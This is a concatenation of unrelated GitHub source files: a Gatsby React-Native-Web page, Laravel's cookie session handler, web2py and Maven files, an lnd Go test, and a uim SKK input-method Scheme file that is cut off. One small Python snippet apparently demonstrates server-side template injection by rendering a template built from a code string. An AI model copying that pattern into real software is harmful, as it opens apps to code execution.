<Text style={styles.text}>
Hi this is React-Native-Web rendered by Gatsby
</Text>
<TouchableOpacity style={styles.button} onPress={() => alert('it works')}>
<Text style={styles.buttonText}>Button</Text>
</TouchableOpacity>
<Link to="/">Go to home</Link>
<Video
source={{
uri: 'https://d23dyxeqlo5psv.cloudfront.net/big_buck_bunny.mp4',
}}
rate={1.0}
isMuted={true}
resizeMode="cover"
shouldPlay={true}
isLooping={true}
style={{ width: 500, marginTop: 30 }}
/>
</View>
)
export default RNWPage
| {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Session;
use SessionHandlerInterface;
use Illuminate\Support\InteractsWithTime;
use Symfony\Component\HttpFoundation\Request;
use Illuminate\Contracts\Cookie\QueueingFactory as CookieJar;
class CookieSessionHandler implements SessionHandlerInterface
{
use InteractsWithTime;
/**
* The cookie jar instance.
*
* @var \Illuminate\Contracts\Cookie\Factory
*/
protected $cookie;
/**
* The request instance.
*
* @var \Symfony\Component\HttpFoundation\Request
*/
protected $request;
/**
* The number of minutes the session should be valid.
*
* @var int
*/
protected $minutes;
/**
* Create a new cookie driven handler instance.
*
* @param \Illuminate\Contracts\Cookie\QueueingFactory $cookie
* @param int $minutes
* @return void
*/
public function __construct(CookieJar $cookie, $minutes)
{
$this->cookie = $cookie;
$this->minutes = $minutes;
}
/**
* {@inheritdoc}
*/
public function open($savePath, $sessionName)
{
return true;
}
/**
* {@inheritdoc}
*/
public function close()
{
return true;
}
/**
* {@inheritdoc}
*/
public function read($sessionId)
{
$value = $this->request->cookies->get($sessionId) ?: '';
if (! is_null($decoded = json_decode($value, true)) && is_array($decoded)) {
if (isset($decoded['expires']) && $this->currentTime() <= $decoded['expires']) {
return $decoded['data'];
}
}
return '';
}
/**
* {@inheritdoc}
*/
public function write($sessionId, $data)
{
$this->cookie->queue($sessionId, json_encode([
'data' => $data,
'expires' => $this->availableAt($this->minutes * 60),
]), $this->minutes);
return true;
}
/**
* {@inheritdoc}
*/
public function destroy($sessionId)
{
$this->cookie->queue($this->cookie->forget($sessionId));
return true;
}
/**
* {@inheritdoc}
*/
public function gc($lifetime)
{
return true;
}
/**
* Set the request instance.
*
* @param \Symfony\Component\HttpFoundation\Request $request
* @return void
*/
public function setRequest(Request $request)
{
$this->request = $request;
}
}
| {
"pile_set_name": "Github"
} |
{{extend 'layout.html'}}
<h1>Account</h1>
{{for flash in current.response.alerts(category_filter='auth'):}}
<div class="flash_message">{{=flash}}</div>
{{pass}}
{{=form}}
| {
"pile_set_name": "Github"
} |
name: bus_update_request_end
ID: 560
format:
field:unsigned short common_type; offset:0; size:2; signed:0;
field:unsigned char common_flags; offset:2; size:1; signed:0;
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
field:int common_pid; offset:4; size:4; signed:1;
field:__data_loc char[] name; offset:8; size:4; signed:0;
print fmt: "client-name:%s", __get_str(name)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>spring-cloud-codegen</artifactId>
<groupId>cn.springcloud.codegen</groupId>
<version>1.0.0</version>
<relativePath>..</relativePath>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>codegen-component-eureka</artifactId>
<dependencies>
<dependency>
<groupId>cn.springcloud.codegen</groupId>
<artifactId>codegen-framework</artifactId>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-1.2-api</artifactId>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>1.7.25</version>
</dependency>
<dependency>
<groupId>com.lmax</groupId>
<artifactId>disruptor</artifactId>
</dependency>
</dependencies>
</project> | {
"pile_set_name": "Github"
} |
import tornado
from tornado.template import Template
code = "{}"
result = tornado.template.Template(code)
template_injection_result = result.generate()
print(template_injection_result)
| {
"pile_set_name": "Github"
} |
15
15
15
15
15
15
15
15
0
15
15
15
15
15
15
15
15
15
15
15
15
15
15
0
0
15
0
0
0
0
0
15
15
0
0
15
15
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
15
0
0
0
15
15
15
15
0
0
0
15
0
0
0
0
0
0
15
15
15
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
15
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
15
15
0
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
0
0
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
15
0
15
15
15
15
15
15
15
15
15
15
15
0
0
15
15
0
0
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
| {
"pile_set_name": "Github"
} |
package hodl_test
import (
"testing"
"github.com/lightningnetwork/lnd/build"
"github.com/lightningnetwork/lnd/htlcswitch/hodl"
)
var hodlMaskTests = []struct {
mask hodl.Mask
flags map[hodl.Flag]struct{}
}{
{
// Check that the empty mask has no active flags.
mask: hodl.MaskNone,
flags: map[hodl.Flag]struct{}{},
},
{
// Check that passing no arguments to MaskFromFlags is
// equivalent to MaskNone.
mask: hodl.MaskFromFlags(),
flags: map[hodl.Flag]struct{}{},
},
{
// Check using Mask to convert a single flag into a Mask only
// reports that flag active.
mask: hodl.ExitSettle.Mask(),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
},
},
{
// Check that using MaskFromFlags on a single flag only reports
// that flag active.
mask: hodl.MaskFromFlags(hodl.Commit),
flags: map[hodl.Flag]struct{}{
hodl.Commit: {},
},
},
{
// Check that using MaskFromFlags on some-but-not-all flags
// reports the correct subset of flags as active.
mask: hodl.MaskFromFlags(
hodl.ExitSettle,
hodl.Commit,
hodl.AddIncoming,
hodl.SettleOutgoing,
),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
hodl.Commit: {},
hodl.AddIncoming: {},
hodl.SettleOutgoing: {},
},
},
{
// Check that using MaskFromFlags on all known flags reports
// those an no other flags.
mask: hodl.MaskFromFlags(
hodl.ExitSettle,
hodl.AddIncoming,
hodl.SettleIncoming,
hodl.FailIncoming,
hodl.AddOutgoing,
hodl.SettleOutgoing,
hodl.FailOutgoing,
hodl.Commit,
hodl.BogusSettle,
),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
hodl.AddIncoming: {},
hodl.SettleIncoming: {},
hodl.FailIncoming: {},
hodl.AddOutgoing: {},
hodl.SettleOutgoing: {},
hodl.FailOutgoing: {},
hodl.Commit: {},
hodl.BogusSettle: {},
},
},
}
// TestMask iterates through all of the hodlMaskTests, checking that the mask
// correctly reports active for flags in the tests' expected flags, and inactive
// for all others.
func TestMask(t *testing.T) {
if !build.IsDevBuild() {
t.Fatalf("htlcswitch tests must be run with '-tags=dev'")
}
for i, test := range hodlMaskTests {
for j := uint32(0); i < 32; i++ {
flag := hodl.Flag(1 << j)
_, shouldBeActive := test.flags[flag]
switch {
case shouldBeActive && !test.mask.Active(flag):
t.Fatalf("hodl mask test #%d -- "+
"expected flag %s to be active",
i, flag)
case !shouldBeActive && test.mask.Active(flag):
t.Fatalf("hodl mask test #%d -- "+
"expected flag %s to be inactive",
i, flag)
}
}
}
}
| {
"pile_set_name": "Github"
} |
;;;
;;; Copyright (c) 2003-2013 uim Project https://github.com/uim/uim
;;;
;;; All rights reserved.
;;;
;;; Redistribution and use in source and binary forms, with or without
;;; modification, are permitted provided that the following conditions
;;; are met:
;;; 1. Redistributions of source code must retain the above copyright
;;; notice, this list of conditions and the following disclaimer.
;;; 2. Redistributions in binary form must reproduce the above copyright
;;; notice, this list of conditions and the following disclaimer in the
;;; documentation and/or other materials provided with the distribution.
;;; 3. Neither the name of authors nor the names of its contributors
;;; may be used to endorse or promote products derived from this software
;;; without specific prior written permission.
;;;
;;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND
;;; ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
;;; ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE
;;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
;;; OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
;;; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
;;; LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
;;; OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
;;; SUCH DAMAGE.
;;;;
;; SKK is a Japanese input method
;;
;; EUC-JP
;;
;; SKKの入力は下記の状態で構成される
;; Following is list of SKK input state
;; 直接入力 direct
;; 漢字入力 kanji
;; 見出し語補完 completion
;; 変換中 converting
;; 送りがな okuri
;; 英数 latin
;; 全角英数 wide-latin
;; 漢字コード入力 kcode
;;
;;
(require "japanese.scm")
(require-custom "generic-key-custom.scm")
(require-custom "skk-custom.scm")
(require-custom "skk-key-custom.scm")
;;; user config
;; TODO: Support new custom type string-list. It involves character
;; encoding conversion problem. -- YamaKen 2005-02-02
(define skk-auto-start-henkan-keyword-list '("を" "、" "。" "." "," "?" "」" "!" ";" ":" ")" ";" ":" ")" "”" "】" "』" "》" "〉" "}" "]" "〕" "}" "]" "?" "." "," "!"))
(define skk-ddskk-like-heading-label-char-list '("a" "s" "d" "f" "j" "k" "l"))
(define skk-uim-heading-label-char-list '("1" "2" "3" "4" "5" "6" "7" "8" "9" "0"))
(define skk-ja-rk-rule (append ja-rk-rule-basic ja-rk-rule-additional))
(define skk-okuri-char-alist '())
(define skk-downcase-alist '())
(define skk-set-henkan-point-key '())
(define skk-ichar-downcase
(lambda (x)
(or (cdr (or (assoc x skk-downcase-alist)
'(#f . #f)))
(ichar-downcase x))))
(define skk-ichar-upper-case?
(lambda (x)
(or (if (assoc x skk-downcase-alist) #t #f) (ichar-upper-case? x))))
(define skk-context-set-okuri-head-using-alist!
(lambda (sc s)
(skk-context-set-okuri-head!
sc
(or (cdr (or (assoc s skk-okuri-char-alist)
'(#f . #f)))
s))))
;; style specification
(define skk-style-spec
'(;; (style-element-name . validator)
(skk-preedit-attr-mode-mark . preedit-attr?)
(skk-preedit-attr-head . preedit-attr?)
(skk-preedit-attr-okuri . preedit-attr?)
(skk-preedit-attr-pending-rk . preedit-attr?)
(skk-preedit-attr-conv-body . preedit-attr?)
(skk-preedit-attr-conv-okuri . preedit-attr?)
(skk-preedit-attr-conv-appendix . preedit-attr?)
(skk-preedit-attr-direct-pending-rk . preedit-attr?)
(skk-preedit-attr-child-beginning-mark . preedit-attr?)
(skk-preedit-attr-child-end-mark . preedit-attr?)
(skk-preedit-attr-child-committed . preedit-attr?)
(skk-preedit-attr-child-dialog . preedit-attr?)
(skk-preedit-attr-dcomp . preedit-attr?)
(skk-child-context-beginning-mark . string?)
(skk-child-context-end-mark . string?)
(skk-show-cursor-on-preedit? . boolean?)
(skk-show-candidates-with-okuri? . boolean?)))
;; predefined styles
(define skk-style-uim
'((skk-preedit-attr-mode-mark . preedit-reverse)
(skk-preedit-attr-head . preedit-reverse)
(skk-preedit-attr-okuri . preedit-reverse)
(skk-preedit-attr-pending-rk . preedit-reverse)
(skk-preedit-attr-conv-body . preedit-reverse)
(skk-preedit-attr-conv-okuri . preedit-reverse)
(skk-preedit-attr-conv-appendix . preedit-reverse)
(skk-preedit-attr-direct-pending-rk . preedit-underline)
(skk-preedit-attr-child-beginning-mark . preedit-reverse)
(skk-preedit-attr-child-end-mark . preedit-reverse)
(skk-preedit-attr-child-committed . preedit-reverse)
(skk-preedit-attr-child-dialog . preedit-none)
(skk-preedit-attr-dcomp . preedit-none)
(skk-child-context-beginning-mark . "[")
(skk-child-context-end-mark . "]")
(skk-show-cursor-on-preedit? . #f)
(skk-show-candidates-with-okuri? . #t)))
(define skk-style-ddskk-like
'((skk-preedit-attr-mode-mark . preedit-underline)
(skk-preedit-attr-head . preedit-underline)
(skk-preedit-attr-okuri . preedit-underline)
(skk-preedit-attr-pending-rk . preedit-underline)
(skk-preedit-attr-conv-body . preedit-reverse)
(skk-preedit-attr-conv-okuri . preedit-underline)
(skk-preedit-attr-conv-appendix . preedit-underline)
(skk-preedit-attr-direct-pending-rk . preedit-underline)
(skk-preedit-attr-child-beginning-mark . preedit-underline)
(skk-preedit-attr-child-end-mark . preedit-underline)
(skk-preedit-attr-child-committed . preedit-underline)
(skk-preedit-attr-child-dialog . preedit-none)
(skk-preedit-attr-dcomp . preedit-underline)
(skk-child-context-beginning-mark . "【")
(skk-child-context-end-mark . "】")
(skk-show-cursor-on-preedit? . #t)
(skk-show-candidates-with-okuri? . #f)))
;;; implementations
(define skk-type-hiragana 0)
(define skk-type-katakana 1)
(define skk-type-hankana 2)
(define skk-input-rule-roma 0)
(define skk-input-rule-azik 1)
(define skk-input-rule-act 2)
(define skk-input-rule-kzik 3)
(define skk-child-type-editor 0)
(define skk-child-type-dialog 1)
;; style elements
(define skk-preedit-attr-mode-mark #f)
(define skk-preedit-attr-head #f)
(define skk-preedit-attr-okuri #f)
(define skk-preedit-attr-pending-rk #f)
(define skk-preedit-attr-conv-body #f)
(define skk-preedit-attr-conv-okuri #f)
(define skk-preedit-attr-conv-appendix #f)
(define skk-preedit-attr-direct-pending-rk #f)
(define skk-preedit-attr-child-beginning-mark #f)
(define skk-preedit-attr-child-end-mark #f)
(define skk-preedit-attr-child-committed #f)
(define skk-preedit-attr-child-dialog #f)
(define skk-preedit-attr-dcomp #f)
(define skk-child-context-beginning-mark #f)
(define skk-child-context-end-mark #f)
(define skk-show-cursor-on-preedit? #f)
(define skk-show-candidates-with-okuri? #f)
(define skk-dic #f)
(define skk-context-list '())
(define skk-prepare-activation
(lambda (sc)
(skk-flush sc)
(skk-update-preedit sc)))
(register-action 'action_skk_hiragana
(lambda (sc)
'(ja_hiragana
"あ"
"ひらがな"
"ひらがな入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-hiragana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-hiragana))))
(register-action 'action_skk_katakana
(lambda (sc)
'(ja_katakana
"ア"
"カタカナ"
"カタカナ入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-katakana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-katakana))))
(register-action 'action_skk_hankana
(lambda (sc)
'(ja_halfkana
"ア"
"半角カタカナ"
"半角カタカナ入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-hankana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-hankana))))
(register-action 'action_skk_latin
(lambda (sc)
'(ja_halfwidth_alnum
"a"
"直接入力"
"直接(無変換)入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(eq? (skk-context-state dsc)
'skk-state-latin)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-latin))))
(register-action 'action_skk_wide_latin
(lambda (sc)
'(ja_fullwidth_alnum
"A"
"全角英数"
"全角英数入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(eq? (skk-context-state dsc)
'skk-state-wide-latin)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-wide-latin))))
(register-action 'action_skk_roma
(lambda (sc)
'(ja_romaji
"R"
"ローマ字"
"ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-roma)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-roma))))
(register-action 'action_skk_azik
(lambda (sc)
'(ja_azik
"Z"
"AZIK"
"AZIK拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-azik)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-azik))))
(register-action 'action_skk_act
(lambda (sc)
'(ja_act
"C"
"ACT"
"ACT拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-act)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-act))))
(register-action 'action_skk_kzik
(lambda (sc)
'(ja_kzik
"K"
"KZIK"
"KZIK拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-kzik)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-kzik))))
;; Update widget definitions based on action configurations. The
;; procedure is needed for on-the-fly reconfiguration involving the
;; custom API
(define skk-configure-widgets
(lambda ()
(register-widget 'widget_skk_input_mode
(activity-indicator-new skk-input-mode-actions)
(actions-new skk-input-mode-actions))
(register-widget 'widget_skk_kana_input_method
(activity-indicator-new skk-kana-input-method-actions)
(actions-new skk-kana-input-method-actions))
(context-list-replace-widgets! 'skk skk-widgets)))
(define skk-context-rec-spec
(append
context-rec-spec
(list
(list 'state 'skk-state-latin)
(list 'kana-mode skk-type-hiragana)
(list 'input-rule skk-input-rule-roma)
(list 'head '())
(list 'okuri-head "")
(list 'okuri '())
(list 'appendix '())
(list 'dcomp-word "")
;(list 'candidates '())
(list 'nth 0)
(list 'nr-candidates 0)
(list 'rk-context '())
(list 'candidate-op-count 0)
(list 'candidate-window #f)
(list 'child-context '())
(list 'child-type '())
(list 'parent-context '())
(list 'editor '())
(list 'dialog '())
(list 'latin-conv #f)
(list 'commit-raw #f)
(list 'completion-nth 0))))
(define-record 'skk-context skk-context-rec-spec)
(define skk-context-new-internal skk-context-new)
(define skk-set-rule!
(lambda (sc input-rule)
(let ((rkc (skk-context-rk-context sc))
(rule (cond
((= input-rule skk-input-rule-roma)
(set! skk-okuri-char-alist '())
(set! skk-downcase-alist '())
(set! skk-set-henkan-point-key '())
skk-ja-rk-rule)
((= input-rule skk-input-rule-azik)
(require "japanese-azik.scm")
(set! skk-okuri-char-alist ja-azik-skk-okuri-char-alist)
(set! skk-downcase-alist ja-azik-skk-downcase-alist)
(set! skk-set-henkan-point-key ja-azik-skk-set-henkan-point-key)
ja-azik-rule)
((= input-rule skk-input-rule-act)
(require "japanese-act.scm")
(set! skk-okuri-char-alist ja-act-skk-okuri-char-alist)
(set! skk-downcase-alist ja-act-skk-downcase-alist)
(set! skk-set-henkan-point-key ja-act-skk-set-henkan-point-key)
ja-act-rule)
((= input-rule skk-input-rule-kzik)
(require "japanese-kzik.scm")
(set! skk-okuri-char-alist '())
(set! skk-downcase-alist '())
(set! skk-set-henkan-point-key '())
ja-kzik-rule))))
(skk-context-set-input-rule! sc input-rule)
(rk-context-set-rule! rkc rule))))
(define skk-find-root-context
(lambda (sc)
(let ((pc (skk-context-parent-context sc)))
(if (not (null? pc))
(skk-find-root-context pc)
sc))))
(define skk-find-descendant-context
(lambda (sc)
(let ((csc (skk-context-child-context sc)))
(if (not (null? csc))
(skk-find-descendant-context csc)
sc))))
(define skk-read-personal-dictionary
(lambda ()
(if (not (setugid?))
(or (skk-lib-read-personal-dictionary skk-dic
skk-uim-personal-dic-filename)
(skk-lib-read-personal-dictionary skk-dic
skk-personal-dic-filename)))))
(define skk-save-personal-dictionary
(lambda ()
(if (not (setugid?))
(skk-lib-save-personal-dictionary skk-dic
skk-uim-personal-dic-filename))))
(define skk-flush
(lambda (sc)
(let ((csc (skk-context-child-context sc)))
(rk-flush (skk-context-rk-context sc))
(if skk-use-recursive-learning?
(skk-editor-flush (skk-context-editor sc)))
(skk-dialog-flush (skk-context-dialog sc))
(if (not (skk-latin-state? sc))
(skk-context-set-state! sc 'skk-state-direct))
(skk-context-set-head! sc '())
(skk-context-set-okuri-head! sc "")
(skk-context-set-okuri! sc '())
(skk-context-set-appendix! sc '())
(skk-reset-dcomp-word sc)
(skk-reset-candidate-window sc)
(skk-context-set-nr-candidates! sc 0)
(skk-context-set-latin-conv! sc #f)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(if (not (null? csc))
(skk-flush csc)))))
(define skk-context-new
(lambda (id im)
(if (not skk-dic)
(let ((hostname (if skk-skkserv-use-env?
(or (getenv "SKKSERVER") "localhost")
skk-skkserv-hostname)))
(if skk-use-recursive-learning?
(require "skk-editor.scm"))
(require "skk-dialog.scm")
(set! skk-dic (skk-lib-dic-open skk-dic-file-name
skk-use-skkserv?
hostname
skk-skkserv-portnum
skk-skkserv-address-family))
(if skk-use-look?
(skk-lib-look-open skk-look-dict))
(skk-read-personal-dictionary)))
(let ((sc (skk-context-new-internal id im))
(rkc (rk-context-new skk-ja-rk-rule #t #f)))
(skk-context-set-widgets! sc skk-widgets)
(skk-context-set-head! sc '())
(skk-context-set-rk-context! sc rkc)
(skk-context-set-child-context! sc '())
(skk-context-set-parent-context! sc '())
(if skk-use-recursive-learning?
(skk-context-set-editor! sc (skk-editor-new sc)))
(skk-context-set-dialog! sc (skk-dialog-new sc))
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-latin)
sc)))
(define skk-latin-state?
(lambda (sc)
(case (skk-context-state sc)
((skk-state-latin skk-state-wide-latin) #t)
(else #f))))
(define skk-make-string
(lambda (sl kana)
(let ((get-str-by-type
(lambda (l)
(cond
((= kana skk-type-hiragana)
(caar l))
((= kana skk-type-katakana)
(car (cdar l)))
((= kana skk-type-hankana)
(cadr (cdar l)))))))
(if (not (null? sl))
(string-append (skk-make-string (cdr sl) kana)
(get-str-by-type sl))
""))))
(define skk-conv-wide-latin
(lambda (sl)
(let ((get-wide-latin-str
(lambda (l)
(ja-wide (caar l)))))
(if (not (null? sl))
(string-append (skk-conv-wide-latin (cdr sl))
(get-wide-latin-str sl))
""))))
(define skk-conv-opposite-case
(lambda (sl)
(let ((get-opposite-case-str
(lambda (l)
(let ((c (string->charcode (caar l))))
(cond
((ichar-upper-case? c)
(charcode->string (+ c 32)))
((ichar-lower-case? c)
(charcode->string (- c 32)))
(else
(caar l)))))))
(if (not (null? sl))
(string-append (skk-conv-opposite-case (cdr sl))
(get-opposite-case-str sl))
""))))
(define skk-opposite-kana
(lambda (kana)
(cond
((= kana skk-type-hiragana)
skk-type-katakana)
((= kana skk-type-katakana)
skk-type-hiragana)
((= kana skk-type-hankana)
skk-type-hiragana)))) ; different to ddskk's behavior
(define skk-context-kana-toggle
(lambda (sc)
(let* ((kana (skk-context-kana-mode sc))
(opposite-kana (skk-opposite-kana kana)))
(skk-context-set-kana-mode! sc opposite-kana))))
(define skk-get-string-mode-part
(lambda (sc res type)
(let ((get-str-by-type
(lambda (l)
(cond
((= type skk-type-hiragana)
(car l))
((= type skk-type-katakana)
(car (cdr l)))
((= type skk-type-hankana)
(cadr (cdr l)))))))
(get-str-by-type res))))
(define skk-do-get-string
(lambda (sc str kana)
(if (not (null? str))
(if (string? (car str))
(skk-get-string-mode-part sc str kana)
(string-append
(skk-do-get-string sc (car str) kana)
(skk-do-get-string sc (cdr str) kana)))
"")))
(define skk-get-string
(lambda (sc str kana)
(let ((res (skk-do-get-string sc str kana)))
(if (and res (> (string-length res) 0))
res
#f))))
;;; no longer used
(define skk-get-string-by-mode
(lambda (sc str)
(let ((kana (skk-context-kana-mode sc)))
(skk-get-string sc str kana))))
(define skk-get-nth-candidate
(lambda (sc n)
(let* ((head (skk-context-head sc))
(cand (skk-lib-get-nth-candidate
skk-dic
n
(cons (skk-make-string head skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
skk-use-numeric-conversion?)))
(if skk-show-annotation?
cand
(skk-lib-remove-annotation cand)))))
(define skk-get-current-candidate
(lambda (sc)
(skk-get-nth-candidate
sc
(skk-context-nth sc))))
(define skk-get-nth-completion
(lambda (sc n)
(skk-lib-get-nth-completion
skk-dic
n
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?
skk-use-look?)))
(define skk-get-current-completion
(lambda (sc)
(skk-get-nth-completion
sc
(skk-context-completion-nth sc))))
(define skk-commit-raw
(lambda (sc key key-state)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit-raw (skk-context-editor psc) key key-state)
(skk-dialog-commit-raw (skk-context-dialog psc) key key-state)))
(begin
(skk-context-set-commit-raw! sc #t)
(im-commit-raw sc))))))
(define skk-commit-raw-with-preedit-update
(lambda (sc key key-state)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit-raw (skk-context-editor psc) key key-state)
(skk-dialog-commit-raw (skk-context-dialog psc) key key-state)))
(begin
(skk-context-set-commit-raw! sc #f)
(im-commit-raw sc))))))
;; commit string
(define skk-commit
(lambda (sc str)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit (skk-context-editor psc) str)
(skk-dialog-commit (skk-context-dialog psc) str)))
(im-commit sc str)))))
(define skk-prepare-commit-string
(lambda (sc)
(let* ((cand (skk-lib-eval-candidate (skk-lib-remove-annotation (skk-get-current-candidate sc))))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(res (string-append cand okuri appendix))
(head (skk-context-head sc)))
(skk-lib-commit-candidate
skk-dic
(cons (skk-make-string head skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
(skk-context-nth sc)
skk-use-numeric-conversion?)
(if (> (skk-context-nth sc) 0)
(skk-save-personal-dictionary))
(skk-reset-candidate-window sc)
(skk-flush sc)
res)))
(define skk-purge-candidate
(lambda (sc)
(let ((res (skk-lib-purge-candidate
skk-dic
(cons
(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
(skk-context-nth sc)
skk-use-numeric-conversion?)))
(if res
(skk-save-personal-dictionary))
(skk-reset-candidate-window sc)
(skk-flush sc)
res)))
(define skk-reset-dcomp-word
(lambda (sc)
(if skk-dcomp-activate?
(skk-context-set-dcomp-word! sc ""))))
(define skk-append-string
(lambda (sc str)
(and
(not (null? str))
(if (not (string? (car str)))
(begin
(skk-append-string sc (car str))
(skk-append-string sc (cdr str)))
#t)
(skk-context-set-head! sc (cons str (skk-context-head sc)))
;;; dcomp
(if skk-dcomp-activate?
(skk-context-set-dcomp-word!
sc
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?))))))
(define skk-append-okuri-string
(lambda (sc str)
(and
(not (null? str))
(if (not (string? (car str)))
(begin
(skk-append-okuri-string sc (car str))
(skk-append-okuri-string sc (cdr str))
)
#t)
(skk-context-set-okuri!
sc
(cons str (skk-context-okuri sc))))))
(define skk-append-residual-kana
(lambda (sc)
(let* ((rkc (skk-context-rk-context sc))
(residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-append-string sc residual-kana)))))
(define skk-begin-conversion
(lambda (sc)
(let ((res (skk-lib-get-entry
skk-dic
